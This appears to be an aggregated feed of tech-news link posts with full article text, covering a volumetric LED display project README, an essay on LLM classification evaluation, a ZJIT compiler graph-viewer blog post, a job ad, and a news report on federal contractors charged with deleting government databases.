
Lobsters
www.lindelystables.dk
2025-12-04 17:07:08
Comments...
Original Article

Sandra L. Hansen

Sandra stiftede Lindely Stables i 2019, men hendes ridekarriere begyndte for alvor i 2002 hvor hun blev optaget på det Danske Pony Landshold, hvor hun var med til at vinde guld ved de Nordiske Mesterskaber. I 2005 repræsenterede hun Danmark til EM i Springning på hest.

Hun har deltaget i mange landsstævner, samt internationale stævner op til 145cm klasser.

Udover at være en dygtig springrytter der ofte selv stiller op, har hun specialiseret sig i tilridning, træning, avl & ernæring, alt på hestens præmisser og i hestens tempo.

I 2024 fik hendes hjemmeavlede Baldur alvorlige problemer med nervøsitet, særligt i forbindelse med stævner. Samtlige produkter, træningsmetoder, behandlinger og råd fra dyrlægen blev afprøvet uden effekt. Det var først da hun faldt over det hollandske Librium , at koden blev knækket.

Librium viste sig at være flydende sindsro for Baldur, der hurtigt fik sin store ride-/stævne glæde tilbage!

Som konsekvens indledte Sandra et samarbejde med Lau Bjørn Jensen og sammen blev de importører af hele Prenimals Prequine serie af tilskud til heste i den højeste kvalitet. Samtlige tilskud bidrager enten til hestens helbred eller livskvalitet og missionen er klar:

Alle heste skal have mulighed for at leve deres bedste hesteliv.

Converge (YC S23) is hiring a martech expert in NYC

Hacker News
www.runconverge.com
2025-12-04 17:00:37
Comments...
Original Article

Converge is building the definitive Growth OS : We help DTC Growth teams understand which marketing efforts drive profitable growth . We are the only platform combining best-in-class tracking with blended reporting and multi-touch attribution.

Our unique positioning has led to rapid growth in both number and size of customers. One of the secrets of our growth is that we invest heavily in customer success . Whereas our competitors see success as a cost center, we take pride in delivering expert martech and marketing reporting support throughout the entire customer lifecycle and we compensate accordingly .

Our strategy is paying off, with 200+ paying customers (including some of the most famous DTC brands) and strong investor backing. We are now looking for a senior Technical Customer Success Manager to help us scale to $10M+ ARR .

Responsibilities

Be a marketing measurement expert : Advise customers on attribution, conversion tracking, and reporting strategies, positioning yourself as a trusted technical partner.

Technical support : Investigate and resolve conversion tracking and attribution issues reported through all channels, including email, Slack and in-app.

Onboard new customers : Own the customer onboarding end-to-end, driving them from initial implementation to real and lasting success.

Drive renewals : Take full ownership of renewal conversations, mitigating churn risk and implementing proactive retention strategies.

Champion customer needs : Surface trends and insights from collected customer feedback to the team at large to inform product roadmap.

Activate: Maximize the adoption of our product features and provide proactive, regular recommendations to get more out of the platform.

Expand customer contracts : Identify and execute expansion opportunities to increase account value.

Lead strategic projects : Improve the support experience and feature adoption.

You will thrive in this role if you

Have strong martech experience : Google Tag Manager, Meta Events Manager, Google Consent Mode and other pieces of the martech stack have no secrets for you.

Are curious and technical : You love understanding complex products deeply. Bonus points if you already love JS debugging, sifting through network requests or reasoning over attribution logic.

Thrive in ambiguity : You enjoy building processes from scratch and figuring things out without a playbook.

Are commercially minded : You know how to uncover customer needs and tie solutions to real business value.

Have advertising experience: You speak the language of a growth team, and have experience with Ads Managers, attribution and creative strategy.

This role is not for you if you

Do not want to become an expert : Our customers choose us because we deeply understand their technical challenges.

Prefer certainty over upside : There are no rigid and limited responsibilities here - we grant a lot of agency and expect a lot of accountability.

Don't like working hard : This role demands more commitment and agency than a typical success role.

Prefer remote over in-person : We believe being in-person helps us move faster.

What we offer

Compensation: $155k - $217k + equity: 0.1% - 0.25%.

Career-defining opportunity to build the U.S. success function and work with the world's best DTC growth teams.

Private health, dental, and vision insurance.

Pension & 401k contributions.

Opportunity to work on a complex product that customers love - 35% of our users use us daily (!)

Interview process*

Application : We're looking to see how your skills and experience align with our needs.

Intro interview (30-min): Our goal is to learn more about what you are looking for in your next role, explore your motivations to join our team, why you would be a great fit, and answer questions about us.

Culture interview (45-min): We will walk through your experience and background in detail.

Case interview (1 hour): We will simulate a real customer situation.

Offer If everyone’s aligned, we’ll move quickly to make you an offer.

(*) can be done in 2 days, just flag to us that you want to do it fast.

We raised $5.7M from some of the best investors

James Hawkins

Nicolas Dessaigne

What makes Converge unique

Ridiculously lean

We operate a >$1M ARR business with >200 customers with a team of just 9 people .

Why you should care:

You will not find a startup with this level of product-market-fit where you can join as employee #10.

Huge product surface

We compete with Segment, Fivetran, Google Tag Manager, Rockerbox, Looker, just to name a few.

Why you should care:

Other startups give you ownership of a feature. At Converge, you get ownership over an entire product .

Customers rely on us

Converge sees 35% of its users daily , while this is only 13% for the average SaaS company.

Why you should care:

Our customers will be excited by every feature you ship, and your impact will be felt immediately .

Real scale

We collect around 20M customer interactions per day and process ~$3B in GMV annually .

Why you should care:

Even though you join early, this job comes with real engineering challenges .

How we started

Did you know…

All co-founders have written code that has run in production as part of Converge.

We closed our first publicly traded company during our YC batch from our living room in San Francisco.

Thomas and Tiago (Founding Engineer) worked together when Thomas was just an intern.

Michel (Customer Success) was responsible for most of the incoming Converge Support tickets in his previous job as a freelance tracking consultant.

Thomas and Jan were best friends in high school, and Jan and Jerome met in their first year of college.

Founding team

Multivox: Volumetric Display

Hacker News
github.com
2025-12-04 16:58:35
Comments...
Original Article

Multivox

This is the code I currently use to drive my volumetric displays .

It supports two closely related devices which are configured in the src/driver/gadgets directory:

  • Rotovox is a 400mm Orb featuring two 128x64 panels arranged vertically side by side.
  • Vortex is a 300mm Orb featuring two 128x64 panels arranged horizontally, back to back.

Rotovox has a higher vertical resolution and better horizontal density; Vortex is brighter and has a higher refresh rate.

The 3D printable parts for Vortex are available here .

A photograph of two orbs, one running Doom, the other GTA

Hardware

This code was originally written for a single display, and the device specific code was later somewhat abstracted out to support a second similar gadget. There are assumptions about the hardware that are pretty well baked in:

  • It consists of two HUB75 LED panels spinning around a vertical axis.
  • The panels use either ABCDE addressing or ABC shift register addressing.
  • It uses a single GPIO (a photodiode or similar) to sync to rotation - high for 180°, low for 180°.
  • It's running on a Raspberry Pi 4.

The GPIO mappings and panel layout are defined in src/driver/gadgets/gadget_<name>.h . GPIO is via memory mapped access - if you're using a different model of Pi you'll need to change BCM_BASE in the GPIO code. I haven't tested this, and you should probably assume it doesn't work.

Input is via a bluetooth gamepad - I've been using an Xbox controller, and the input system is based on the default mapping for that.

Audio out is also via bluetooth. I haven't had success with the higher quality codecs, but the headset protocol works.

Layout

There are two parts to this code - the driver, which creates a voxel buffer in shared memory and scans its contents out in sync with rotation, and the client code which generates content and writes it into the voxel buffer. Both driver and client code are designed to run on the same device, a Raspberry Pi embedded in the hardware and spinning at several hundred RPM. There is a demo included in the Python directory which streams point clouds from a PC over wifi to the device, but fundamentally it's designed as a self contained gadget, like an alternate timeline Vectrex. A bluetooth gamepad is used to control the demos.

├── src
│   ├── driver
│   │   ├── gadgets         -- the different volumetric display configurations
│   │   │   └──             
│   │   └── vortex.c        -- driver code - creates a voxel buffer in shared memory,
│   │                          and handles scanning it out to the led panels in sync with
│   │                          the rotation
│   ├── simulator
│   │   └── virtex.c        -- software simulator - presents the same voxel buffer as
│   │                          the driver would, but renders the contents into an X11 window
│   │
│   ├── multivox            -- front end / launcher for the various volumetric toys
│   │   └──
│   ├── platform            -- common client code
│   │   └──
│   └── toys                -- a collection of volumetric demos using the shared voxel buffer
│       ├── eighty          -- multiplayer light cycles
│       ├── fireworks.c     -- cheesy first demo
│       ├── flight.c        -- some kind of 70s scifi thing
│       ├── tesseract.c     -- a 4D cubube
│       ├── viewer.c        -- viewer for .obj and .png files
│       └── zander          -- lander/zarch/virus-esque
├── python  
│   ├── calibration.py      -
│   ├── grid.py             -- some pattern generators, useful when calibrating the device
│   ├── colourwheel.py      -
│   ├── obj2c.py            -- tool for embedding .obj models in a header file
│   ├── pointvision.py      -- receive point clouds streamed from vortexstream.py
│   └── vortexstream.py     -- stream point clouds to pointvision.py
└── README.md               -- you are here

Building

On the Raspberry Pi, clone the repository:

git clone https://github.com/AncientJames/multivox.git

Configure the project for your hardware:

cd multivox
mkdir build
cd build
cmake -DMULTIVOX_GADGET=vortex ..
cmake --build .

Running

First, the driver has to be running:

When invoked from the command line it periodically outputs profiling information (frame rate, rotation rate), and accepts keyboard input for various diagnostics:

Key Effect
esc Exit
b Bit depth - cycles through 1, 2 or 3 bits per channel. Higher bit depths result in lower refresh rates
u Uniformity - cycles through different strategies for trading off brightness against uniformity
t Trails - adjusts how far back to accumulate skipped voxels when the rotation rate is too high for the refresh rate
l Lock - whether to adjust the rotation sync to keep it facing one way
d D Drift - rotisserie mode. Introduces some explicit drift to the rotation sync
p Panel - selectively disable the panels
xyz Axis - When the display isn't spinning, it shows an othographic view. This lets you choose the axis

While that's running, try one of the toys:

The viewer takes a list of .obj and .png files as arguments. You can scale, rotate and so on using the gamepad, and it also accepts keyboard input when run remotely from the command line.

./viewer ~/Multivox/models/*.obj
Control Key Effect
esc Exit
LB/RB [ / ] Cycle through models
A Walkthrough / Orbit
X Zoom to fit
Y Toggle wireframe

Simulator

If you don't have a physical volumetric display, there's a simulator, virtex , which you can run in place of vortex . It exposes the same voxel buffer in shared memory, but renders the contents using OpenGL in an X11 window.

Screenshot of a tesseract rendered in Virtex

Run without command line arguments it creates a display compatible with the currently configured gadget, but there are some options to let you experiment with different geometries:

Option Effect
-s X slice count - the number of vertical slices per revolution
-o X X offsets - distance the front and back screens are offset from the axis, as a fraction of screen radius
-b X bits per channel (1 - 3)
-w X Y panel resolution
-g X scan geometry - radial or linear. Linear looks better, but it's a lot harder to build.

An idealised device with linear scanning and 3 bits per channel can be invoked like this:

./virtex -g l -s 128 -w 1280 1280 -b 3

The simulator is fill rate intensive; if you're running it on a Raspberry Pi you'll probably want to reduce the slice count.

Installing

If you want it to start up automatically on boot, you can install vortex as a service, and set multivox to run on startup.

First install everything to its default location ~/Multivox :

make install

This will build the executable files and copy them into the destination directory, as well as creating .mct files in ~/Multivox/carts for the built in toys.

Create the driver service:

sudo nano /usr/lib/systemd/system/vortex.service

and fill in the following information:

[Unit]
Description=Vortex Display Driver
After=multi-user.target

[Service]
ExecStart=/home/pi/Multivox/bin/vortex

[Install]
WantedBy=multi-user.target

Then start it up:

sudo systemctl daemon-reload
sudo systemctl enable vortex.service

The driver assigns itself to core 3 - you can add isolcpus=3 to the end of /boot/cmdline.txt to ensure it's the only thing running on that core.

You'll also want the launcher to start up on boot:

And add the line:

@reboot /home/pi/Multivox/bin/multivox

Multivox

If everything goes smoothly, when you turn on the device it will boot up into Multivox . This is a fantasy console which acts as a launcher for all the games and demos you run on the hardware. The bundled toys are automatically installed in the ~/Multivox/carts/ directory as .mct files, and external apps can be launched by adding a .mct file containing its command, path and arguments.

Each .mct file appears as a cartridge in the Multivox front end. They should each have a label on the side; at the moment all you can do to distinguish between them is change their colour in the .mct .

When you exit an app back to the launcher, it saves a snapshot of the voxel volume, and this gives a preview of what you'll see when you launch a cart. This means there are two competing representations of the same information, and any future work on the front end will probably start with overhauling the entire approach.

Some basic UI for controls such as changing bit depth, rebooting and so on would also be a boon.

Control Effect
LB/RB Cycle through carts
A Launch cart
Exit / resume running cart
△ ▽ Change bit depth
☰ x5 Power off

The End of the Train-Test Split

Hacker News
folio.benguzovsky.com
2025-12-04 16:53:49
Comments...
Original Article

2015: Loosely based on a true story.

You are a machine learning engineer at Facebook in Menlo Park. Your task: build the best butt classification model, which decides if there is an exposed butt in an image.

The content policy team in D.C. has written country-specific censorship rules based on cultural tolerance for gluteal cleft—or butt crack, for the uninitiated.

  • Germany: 0% cleft.
  • Zimbabwe: 30% cleft.
  • Cupertino: 0%.
  • Montana: 20%.

A PM on your team writes data labeling guidelines for a business process outsourcing firm (BPO), and each example in your dataset is triple-reviewed by the firm's outsourced team to ensure consistency. You skim the labels, which seem reasonable.

import torch import pandas as pd from torch.utils.data import DataLoader, TensorDataset from sklearn.model_selection import train_test_split df = pd.read_csv("gluteal_cleft_labels.csv") X = df.drop("label", axis=1).values y = df["label"].values x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

You decide to train a CNN: it'll be perfect for this edge detection task. Two months later, you've cracked it. Your model goes live, great success, 92% precision, 98% recall. You never once had to talk to the policy team in D.C.

2023: The butt model has been in production for 8 years.

Another email: Policy has heard about LLMs and thinks it's time to build a more "context-aware" model. They would like the model to understand whether there is sexually suggestive posing, sexual context, or artistic intent in the image.

You receive a 10 page policy doc. The PM cleans it up a bit and sends it to the BPO. The data is triple reviewed, you skim the labels, and they seem fine.

You make an LLM decision tree, one LLM call per policy section, and aggregate the results. Two months pass. You are stuck at 85% precision and recall, no matter how much prompt engineering and model tuning you do. You try going back to a CNN, training it on the labels. It scores 83%.

Your data science spidey-sense tingles. Something is wrong with the labels or the policy.

You email the policy team, sending them the dataset and results.

The East Coast Metamates say they looked at 20 of the labels. 60% were good, 20% were wrong, 20% were edge cases they hadn’t thought of.

The butt model lives to fight another day, or at least until these discrepancies get sorted out.

2025.

The butt model is still in production… What went wrong?

The train-test split does not work for classification tasks at the frontier of LLM capability.

It doesn't matter if the task is content policy, sales chatbots, legal chatbots, or AI automation in any other industry.

Test Split: Any task complicated enough to require an LLM will need policy expert labels. [1] To detect nudity, outsourced labels will do, but to enforce a 10 page adult policy, you need the expert. Experts have little time: they can't give you enough labels to run your high scale training runs. You can't isolate enough data for a test set without killing your training set size. On top of that, a 10 page policy comes with so much gray area that you can’t debug test set mistakes without looking at test set results and model explanations.

Train Split: You no longer need a large, discrete training set because LLMs often don't need to be trained on data: they need to be given clear rules in natural language, and maybe 5-10 good examples. [2] Today, accuracy improvements come from an engineer better understanding the classification rules and better explaining them to the model, not from tuning hyperparameters or trying novel RL algorithms. Is a discrepancy between the LLM result and the ground truth due to the LLM’s mistake, the labeler’s mistake, or an ambiguous policy line? This requires unprecedented levels of communication between policy and engineering teams.

Recommending a New Split: Don’t train the LLM on any of the dataset. Address the inevitable biases with evaluation on blind, unlabeled data. [3] To understand why this is the best approach, we need to dive deeper into why the train-test split paradigm doesn't suffice.

Core problems with complex classification tasks

Policy Experts write abstract rules. For older classification tasks, the rules had to be simple, because simple was all that models could do. Are there guns in the image? Is there a minor in the image? Complicated tasks are harder to pin down.

  • What is hate speech?
  • What is sexually suggestive?
  • What makes false advertising cross from overdone to illegal?

Take these examples. Sexually suggestive? Artistic expression? Sufficient censorship?

Policy example

Source: Lorde's album covers from Vice.com, where you can find discussion of what is visible or not in each photo.

Most policy documents are not well-kept. A content policy is typically simplified, operationalized, and sent to outsourced teams to enforce. Edge cases and discrepancies found in India never make it back to policy teams in DC, so abstract rules are rarely pinned down.

In production, we see 15-20% false positive rates on BPOs. Half are attributable to human error, half to policy gray area.

To resolve edge cases, labeling tasks require an expert's time. BPO agents can eyeball how much butt is visible, but struggle with what is "sexually suggestive." BPOs are low-wage workers in countries like India or the Phillipines, and may have different definitions of "sexual context" than the policy writers intended. The costs of training them are often prohibitive at scale.

Using in-house agents is not sufficient for training data, either, as small alignment issues in the dataset cause large issues in production: If internal agents are 95% accurate (pretty good), the ceiling for the LLM's performance is 95%. If the LLM gets 95% of those labels right, its accuracy will be 90%.

Hard classification tasks have high rates of expert disagreement. Ask two people if there's a gun in an image, odds are they'll agree. Ask two policy experts whether a pose is sexually suggestive per their definition, you will start a one hour debate. If two experts only agree 95% of the time, then hand off to internal agents for labeling at 95% accuracy, then the LLM is 95% accurate, you are down to 86% LLM accuracy.

Language models see details in data that even experts miss. LLMs read every word of the product description. They scrutinize every image for a single pixel of gluteal cleft. They see gluteal cleft through sheer clothing, in low opacity, and in the bottom left corner of the back of a t-shirt. Even if experts have reviewed the data, there must be a re-review and feedback loop to check what the LLM has flagged.

Since labels are often wrong or ambiguous, you cannot keep the test set blind. If the LLM is right and the labels are wrong, either because the expert missed something, the policy was ambiguous, or the outsourced labeler was wrong, you have to look at the test set results to check. Moreover, you need to review the LLM's explanation while reviewing the new data to see what it found, confounding any true "blind" test. [4]

In production, we see anywhere from 15-30% error rates in data considered "golden sets" by operations teams.

Given the need for expert input and policy clarifications, you cannot maintain large enough training sets to keep the test set blind. For a simple policy, maintaining good labeled data is straightforward. However, attempting to integrate an LLM is often the first time a policy expert will be asked to scrutinize their rules and labels. Their time is valuable, and they will not be able to bring their expertise to a large dataset.

Complicated policies change, especially under scrutiny, and re-labeling affected examples is time-consuming. A leaner training set will be more valuable than a larger one in the long run.

Since these classification tasks are so complex, you can only "debug" the model by looking at the input and its explanations side-by-side. A policy might have dozens of rules and thousands of possible inputs, creating a fat-tail of model mistakes. Unlike traditional machine learning, where you fix mistakes by changing the design or hyperparameters of your model, you fix LLM mistakes by changing the prompt. You can directly fix a mistake (e.g. by telling the model "do not consider spreading legs fully clothed to be sexually suggestive"), so keeping mistakes hidden only hurts accuracy. [5]

You still need to run blind tests: QA the models on new data. Organizations end up running their models in "shadow mode" on production data, creating test examples without taking real-world actions. Here, you'll likely need an in-house agent to review the examples, then forward edge cases to a policy expert.

The Policy and Engineering Teams Need to be in Direct, Frequent Communication. The SF-DC split doesn't work anymore. Resolving edge cases and, in many cases, changing the policy to reflect patterns identified in the data requires collaboration.

Experts have historically not needed to look at the data—seen as a low-status task—but it is the only way to achieve high accuracy. This is an unsolved problem in many large organizations that blocks LLM integrations.

Most importantly, LLMs do not "train" on data the way traditional classifiers do, so there is often no need to have a "training" set, either. LLMs can enforce complicated, natural language rules because they can take natural language inputs, not because they can learn patterns from thousands of training examples. LLM accuracy is often a prompting task, not a design-your-RL-pipeline task. [1]

If you want a model to classify whether animals are endangered species, don't give it 1,000 examples of elephant ivory, 100 examples of every species on the CITES list, and 1,000 pictures of your non-endangered dog, give it the list of species names as inputs.

The "training" step for language models has to be policy alignment, not heating up GPUs. Since the data will always be flawed and the test set won't be blind, the machine learning engineer's priority should be spent working with policy teams to improve the data. That means surfacing edge cases and policy gray areas, clarifying policy definitions, and leveraging LLM outputs to find more discrepancies until data is high-quality and policy is clear.

In production, this is an ongoing process, as LLMs will always surface new interesting cases and policies will continue to change. Policies and enforcement are better for this feedback loop: it enables consistent, scaled enforcement platform-wide.

Today and Tomorrow

This is a paradigm shift that many machine learning teams, and enterprises as a whole, have not yet embraced. It requires a complete change in how we approach classification tasks.

If this is the road to automation, is it even worthwhile? The process described above, while arduous, is the shortest route to consistent policy enforcement to date. Before LLMs, running a successful quality assurance program would be prohibitively expensive. Retraining human agents takes far longer than retraining LLMs. Policy experts have historically never been owners in quality assurance processes, but now can be.

To save a little time, an in-house human agent might do a first review of the results, then a policy expert can review only the discrepancies. We find this tradeoff works well in production.

What are the implications for leveraging LLMs for tasks which do not have binary classifications ? Can an LLM be a lawyer if this much work is required to align, evaluate, and test models? Will an LLM ever ~know what you mean~ and skip all these alignment steps?

One core problem with the LLM architecture is that the model doesn't know when it is wrong. Model improvements over the past few years mean the LLM is right more often, but when it is wrong, it doesn't have an outlet.

This is a perennial machine learning problem: a model does not know what is "out of distribution" for itself.

Until that problem is solved, there will have to be an engineer in the loop improving and testing the model, and a policy expert evaluating the results. You can do this for complicated tasks like writing a patent application, but you have to be rigorous, define a rubric, curate expert data, and regularly evaluate model outputs. Calculating accuracy of each "training run" will never be as easy as checking if model_output == ground_truth, and will require a human in the loop. These complex tasks are far more lucrative than binary classification, and smart people are working on them.

Not everybody will take this rigorous approach, and as models improve, they might not have to. Until then, the highest leverage way to spend your time in 2026 will be looking closely at your data, cleaning your data, and labeling your data.

Launch HN: Browser Buddy (YC W24) – A recommendation system for Internet writing

Hacker News
www.browserbuddy.com
2025-12-04 16:52:56
Comments...
Original Article

A For-You page for writing Explore the best essays and blogs on the Internet with Browser Buddy.

Download on the App Store

Adding Iongraph support to ZJIT

Lobsters
railsatscale.com
2025-12-04 16:49:25
Comments...
Original Article

ZJIT adds support for Iongraph, which offers a web-based, pass-by-pass viewer with a stable layout, better navigation, and quality-of-life features like labeled backedges and clickable operands.

Prelude

I’m an intern on the ZJIT team for the fall term. I also have a rather bad habit of being chronically on lobste.rs .

While idly browsing, I spotted an article by Ben Visness titled Who needs Graphviz when you can build it yourself? , which covers his work on creating a novel graph viewer called Iongraph .

Iongraph used to visualize an IR graph for the SpiderMonkey JIT inside Firefox.

Immediately, I was intrigued. I like looking at new technology and I wondered what it might be like to integrate the work done in Iongraph with ZJIT, getting all sorts of novel and interesting features for free. I suspected that it could also help other engineers to reason about how their optimizations might affect the control flow graph of a given function.

Also, it just looks really cool. It’s got nice colours, good built-in CSS, and is built in a fairly extensible way. The underlying code isn’t hard to read if you need to make changes to it.

Investigating further

Iongraph is compelling for a few reasons.

It supports stable layouts, which means that removing or adding nodes (something that can happen when you run an optimization pass) doesn’t shift the location of other nodes to an extreme degree. Iongraph also gives all sorts of interactive options, like clickable operands, scrollable graphs, or arrow keys to navigate between different nodes.

An especially useful feature is the ability to switch between different compiled methods with a small selector. In our codebase, ZJIT compiles each method on its own, so using a tool like this allows us to inspect method level optimizations all in one pane of a web browser. Of course, there are other great features, like loop header highlighting or being able to click on optimization passes to see what the control flow graph looks like after they’re applied.

Proposal

Roughly an hour after I read through said article, I noticed that my mentor, Max , had also posted it in an internal team chat, mentioning that it would be cool to support it.

Of course, I was tempted by this project. As is a common trait for interns, I was tempted to take on a new, shiny project despite not knowing what it might imply to actually develop it. After talking to Max further, he clarified that this would require significant infrastructure work — or at the very least, more than initially apparent.

Building

A JSON library inside ZJIT?

Looking into the Iongraph format, I figured that I would have to use some sort of JSON crate. Since ZJIT as a project doesn’t rely strictly on using Rust tooling like cargo , directly adding serde_json as a dependency was out of the question. Another compelling option was vendoring it (or a smaller JSON library), but that was likely to include features that we did not want or introduce licensing issues.

After a quick discussion, I settled on implementing the functionality myself. I read a bit of the JSON specification, and got a sense of the ideal way to design the library’s API. Ultimately, I chose to opt for readability and usability over raw performance. This decision I think is reasonable given that the serialization code is not in the critical path of the compiler. It’s also accurate to say that the interface is clean enough to replace the internals in the future with minimal issue should there be more performance needed.

In designing the serializer, I chose to target RFC 8259 , which provides more freedom than previous specifications. As noted in said RFC, historical specifications constrained the top level value to be an array or an object, but this spec (and my implementation) don’t require that constraint. I also opted to avoid comments, encode strictly in UTF-8, and escape control characters. Notably, RFC 8259 does not impose a limit on precision of numbers, just that infinity, negative infinity, or NaN are restricted.

Computing control flow graph properties

With JSON serialization handled, the more challenging work was computing the graph metadata that Iongraph requires. The format expects explicit successor and predecessor relationships, loop headers, and back edge sources — information that ZJIT doesn’t normally compute since it’s not needed for compilation at this stage of compiler development.

One constraint I had to contend with was that the Iongraph format needs the user to manually provide the successor and predecessor nodes for a given node in a control flow graph. In ZJIT, we compile individual methods at a time as Function s (our internal representation) that hold a graph of Block s. Each Block is a basic block that you would find in a compiler textbook. (One caveat to understand is that we use extended basic blocks, meaning that blocks can have jump instructions at any point in their contained instructions — not just at the end.)

The process of computing successors and predecessors is fairly simple. As you iterate through the list of blocks, all blocks referenced as the target of a jump-like instruction (whether conditional or unconditional) are added to the successor set. Then for each successor, update their predecessor set to include the block currently being operated on.

The next task I had to solve was computing the loop headers and back edge sources.

Required in the process of computing both of these are computing the dominators for blocks in a control flow graph. We can state that a block i dominates a block j if all paths in the control flow graph that reach j must go through i . Several algorithms exist for computing dominators. There exist both simple iterative options and more complicated versions. Initially, I heard of a fixed point iteration option that was very straightforward to implement but perhaps not the most efficient. That one (which I will discuss shortly) runs in quadratic time to the number of blocks available. In A Simple, Fast Dominance Algorithm by Cooper, Harvey, and Kennedy, both this iterative solution as well as one that is optimized to use less space are mentioned. A third option is the Lengauer-Tarjan algorithm, which has better worst case bounds compared to both the iterative and tuned implementations.

Based on the goals of the project, I opted to use the iterative algorithm, since it performs well and doesn’t incur serious memory use penalties for a small number of blocks in a control flow graph. It can be described as such:

dom = {}
nodes.each do |node|
  if entry_nodes.include?(node)
    dom[node] = Set[node]
  else
    dom[node] = nodes.to_set
  end
end

changed = true
while changed
  changed = false
  nodes.reverse_post_order.each do |node|
    preds = predecessors(node)
    pred_doms = preds.map { |p| dom[p] }

    # Intersection of all predecessor dominators
    intersection = if pred_doms.empty?
                     Set.new
                   else
                     pred_doms.reduce(:&)
                   end

    # Union with {node}
    new_set = intersection | Set[node]

    if new_set != dom[node]
      dom[node] = new_set
      changed = true
    end
  end
end

Implementing this is fairly simple, and it runs quickly enough for the limited number of nodes that it is totally acceptable.

To compute successors we use the following snippet:

let successors: BTreeSet<BlockId> = block
    .insns
    .iter()
    .map(|&insn_id| uf.find_const(insn_id))
    .filter_map(|insn_id| {
        Self::extract_jump_target(&function.insns[insn_id.0])
    })
    .collect();

Here we go through all the instructions in a given block. We use a union find data structure to map instructions to their canonical representatives (since some optimizations may have merged or aliased instructions). We then filter by extract_jump_target , which returns an Option that contains a BlockId for jump-like instructions.

After finding successors, we can set the predecessors by iterating through the nodes in the successor set and adding the current node to their predecessor sets.

The last important thing we need to consider is finding the loop depth.

For finding this, we need to consider first how we can find a natural loop in the first place.

We identify natural loops by detecting back edges. A back edge occurs when a block has a predecessor that is dominated by that block (all paths to the predecessor pass through this block). When we find such an edge, the target block is a loop header and the predecessor is the source of a back edge. The natural loop consists of all blocks on paths from the back edge source to the loop header (excluding the header itself). Each block within this natural loop then has its loop depth incremented.

These additional computations are used within the Iongraph layout engine to determine the height at which a given block should be vertically, or where lines should be routed within the graph. Loop headers and back edge sources are also marked!

The final result

You can click around this demo graph showing a simple example from ZJIT to get a sense of how Iongraph works! Operands are clickable to get to their definition. You can click on the phases of optimization on the left side - note that only the non-grayed out passes will have made changes. The graph is also zoomable and scrollable!

Hopefully this post was educational! I learned a lot implementing this feature and enjoyed doing so.

If you would like to do some work on ZJIT (and learn a lot in the process), you are welcome to make pull requests to github.com/ruby/ruby/ with the commit prefix ZJIT: . You can find issues here .

Also, feel free to join our Zulip !

Alan Dye Comments on His Career Move in an Instagram Story

Daring Fireball
x.com
2025-12-04 16:31:34
Straight/dumb quotation marks. Some default Instagram typeface. That period just hanging there, outside the closing quote. This is the post from the man who led Apple’s software design for a decade. Not to mention the gall to use any quote from Steve Jobs, let alone this particular one, which is en...

Contractors with hacking records accused of wiping 96 govt databases

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 16:30:59
U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors. [...]...
Original Article

Hackers

U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors.

Twin brothers Muneeb and Sohaib Akhter, both 34, were also sentenced to several years in prison in June 2015, after pleading guilty to accessing U.S. State Department systems without authorization and stealing personal information belonging to dozens of co-workers and a federal law enforcement agent who was investigating their crimes.

Muneeb Akhter also hacked a private data aggregation company in November 2013 and the website of a cosmetics company in March 2014.

After serving their sentences, they were rehired as government contractors and were indicted again last month on charges of computer fraud, destruction of records, aggravated identity theft, and theft of government information.

"Following the termination of their employment, the brothers allegedly sought to harm the company and its U.S. government customers by accessing computers without authorization, issuing commands to prevent others from modifying the databases before deletion, deleting databases, stealing information, and destroying evidence of their unlawful activities," the Justice Department said in a Wednesday press release .

According to court documents , Muneeb Akhter deleted roughly 96 databases containing U.S. government information in February 2025, including Freedom of Information Act records and sensitive investigative documents from multiple federal agencies.

One minute after deleting a Department of Homeland Security database, Muneeb Akhter also allegedly asked an artificial intelligence tool for instructions on clearing system logs after deleting a database.

The two defendants also allegedly ran commands to prevent others from modifying the targeted databases before deletion, and destroyed evidence of their activities. The prosecutors added that both men wiped company laptops before returning them to the contractor and discussed cleaning out their house in anticipation of a law enforcement search.

The complaint also claims that Muneeb Akhter stole IRS information from a virtual machine, including federal tax data and identifying information for at least 450 individuals, and stole Equal Employment Opportunity Commission information after being fired by the government contractor.

Muneeb Akhter has been charged with conspiracy to commit computer fraud and destroy records, two counts of computer fraud, theft of U.S. government records, and two counts of aggravated identity theft. If found guilty, he faces a minimum of two years in prison for each aggravated identity theft count, with a maximum of 45 years on other charges.

His brother, Sohaib, is charged with conspiracy to commit computer fraud and password trafficking, facing a maximum penalty of six years if convicted.

"These defendants abused their positions as federal contractors to attack government databases and steal sensitive government information. Their actions jeopardized the security of government systems and disrupted agencies' ability to serve the American people," added Acting Assistant Attorney General Matthew R. Galeotti of the DOJ's Criminal Division.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Autism should not be treated as a single condition

Hacker News
www.economist.com
2025-12-04 16:25:31
Comments...

Django 6.0 released

Lobsters
www.djangoproject.com
2025-12-04 16:20:11
Comments...
Original Article

The Django team is happy to announce the release of Django 6.0.

The release notes assembles a mosaic of modern tools and thoughtful design. A few highlights are:

  • Template Partials: modularize templates using small, named fragments for cleaner, more maintainable code. (GSoC project by Farhan Ali Raza , mentored by Carlton Gibson )
  • Background Tasks: run code outside the HTTP request-response cycle with a built-in, flexible task framework. ( Jake Howard )
  • Content Security Policy (CSP): easily configure and enforce browser-level security policies to protect against content injection. ( Rob Hudson )
  • Modernized Email API: compose and send emails with Python's EmailMessage class for a cleaner, Unicode-friendly interface. ( Mike Edmunds )

You can get Django 6.0 from our downloads page or from the Python Package Index .

The PGP key ID used for this release is Natalia Bidart: 2EE82A8D9470983E

With the release of Django 6.0, Django 5.2 has reached the end of mainstream support. The final minor bug fix release, 5.2.9 , was issued yesterday. Django 5.2 will receive security and data loss fixes until April 2028. All users are encouraged to upgrade before then to continue receiving fixes for security issues.

Django 5.1 has reached the end of extended support. The final security release, 5.1.15 , was issued on Dec. 2, 2025. All Django 5.1 users are encouraged to upgrade to a supported Django version.

See the downloads page for a table of supported versions and the future release schedule.

Feynman vs. Computer

Hacker News
entropicthoughts.com
2025-12-04 16:03:02
Comments...
Original Article

I read Burghelea’s article on the Feynman trick for integration . Well, I’m not good enough at analysis to follow along, but I tried reading it anyway because it’s fascinating.

